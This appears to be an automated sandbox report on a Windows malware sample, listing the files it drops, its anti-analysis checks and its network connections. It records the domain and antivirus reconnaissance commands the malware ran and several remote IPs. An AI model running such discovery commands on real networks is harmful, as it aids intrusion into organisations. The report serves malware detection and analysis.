Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180010451 push rcx; ret 5_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018001045A push rcx; ret 5_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001801758FC push rsp; ret 5_2_00000001801758FD
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180175CDE push 2027C70Fh; ret 5_2_0000000180175CE5

Persistence and Installation Behavior
barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\msiexec.exe Executable created and started: C:\Windows\Installer\MSI181.tmp Jump to behavior
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Drops PE files
Source: C:\Windows\System32\rundll32.exe File created: :wtfbbq (copy) Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA3.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI54.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC4.tmp Jump to dropped file
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\sharepoint\360total.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIFFD6.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI181.tmp Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA3.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI54.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC4.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIFFD6.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI181.tmp Jump to dropped file

Boot Survival
barindex
Uses net.exe to modify the status of services
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 5_2_0000000180049AEC
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 5_2_0000000180062148
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\rundll32.exe Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection, 5_2_00000001800655A8
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049AEC 5_2_0000000180049AEC
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103176DC rdtsc 6_3_00000180103176DC
Contains functionality to query network adapater information
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 5_2_00000235B5CE68E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo, 5_2_00000235B5CF0EF8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 5_2_00000235B5CE7FA8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 7_2_000001EF532B68E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 7_2_000001EF532B7FA8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo, 7_2_000001EF532C0EF8
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 737 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 663 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 8599 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\rundll32.exe Dropped PE file which has not been started: :wtfbbq (copy) Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIA3.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI54.tmp Jump to dropped file
Source: C:\Windows\System32\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIC4.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIFFD6.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\360total.dll Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Windows\Installer\MSI181.tmp Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\Installer\MSI181.tmp API coverage: 7.4 %
Source: C:\Windows\System32\rundll32.exe API coverage: 1.6 %
Source: C:\Windows\System32\rundll32.exe API coverage: 8.2 %
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049AEC 5_2_0000000180049AEC
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 7536 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7628 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7788 Thread sleep count: 737 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7788 Thread sleep time: -737000s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7800 Thread sleep count: 663 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7800 Thread sleep time: -66300s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7788 Thread sleep count: 8599 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7788 Thread sleep time: -8599000s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Queries the current domain controller via net
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005BB02D FindFirstFileExW,FindNextFileW,FindClose,FindClose, 3_2_005BB02D
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CEA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 5_2_00000235B5CEA350
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 5_2_00000235B5CE1A08
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010316604 FindFirstFileA,FindNextFileA, 6_3_0000018010316604
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103116F4 FindFirstFileW,FindNextFileW, 6_3_00000180103116F4
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532BA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 7_2_000001EF532BA350
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 7_2_000001EF532B1A08
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031AC90 GetSystemInfo, 6_3_000001801031AC90
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\ Jump to behavior
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1640113288.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1646222764.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1647249361.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1646955380.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1646701265.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1647698950.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903527062.000001800DFBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW*
Source: rundll32.exe, 00000006.00000003.2933135638.0000018010220000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103176DC rdtsc 6_3_00000180103176DC
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_0058D0A5 IsDebuggerPresent,OutputDebugStringW, 3_2_0058D0A5
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW, 5_2_0000000180066C3C
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 5_2_00000001800033E0
Contains functionality to read the PEB
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005BAD78 mov eax, dword ptr fs:[00000030h] 3_2_005BAD78
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005B2DCC mov ecx, dword ptr fs:[00000030h] 3_2_005B2DCC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_00582310 GetProcessHeap, 3_2_00582310
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A33A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_005A33A8
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A353F SetUnhandledExceptionFilter, 3_2_005A353F
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A2968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_005A2968
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A6E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_005A6E1B
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.46.75 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.197.34 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443 Jump to behavior
Contains functionality to launch a program with higher privileges
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005852F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,GetProcessId,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess, 3_2_005852F0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\Installer\MSI181.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle, 5_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 5_2_0000000180049278
Source: 360total.dll.1.dr Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe Binary or memory string: Progman
Source: rundll32.exe Binary or memory string: Program manager
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A35A9 cpuid 3_2_005A35A9
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Installer\MSI181.tmp Code function: EnumSystemLocalesW, 3_2_005BE0C6
Source: C:\Windows\Installer\MSI181.tmp Code function: EnumSystemLocalesW, 3_2_005BE111
Source: C:\Windows\Installer\MSI181.tmp Code function: EnumSystemLocalesW, 3_2_005B7132
Source: C:\Windows\Installer\MSI181.tmp Code function: EnumSystemLocalesW, 3_2_005BE1AC
Source: C:\Windows\Installer\MSI181.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_005BE237
Source: C:\Windows\Installer\MSI181.tmp Code function: GetLocaleInfoEx, 3_2_005A23F8
Source: C:\Windows\Installer\MSI181.tmp Code function: GetLocaleInfoW, 3_2_005BE48A
Source: C:\Windows\Installer\MSI181.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_005BE5B3
Source: C:\Windows\Installer\MSI181.tmp Code function: GetLocaleInfoW, 3_2_005BE6B9
Source: C:\Windows\Installer\MSI181.tmp Code function: GetLocaleInfoW, 3_2_005B76AF
Source: C:\Windows\Installer\MSI181.tmp Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_005BE788
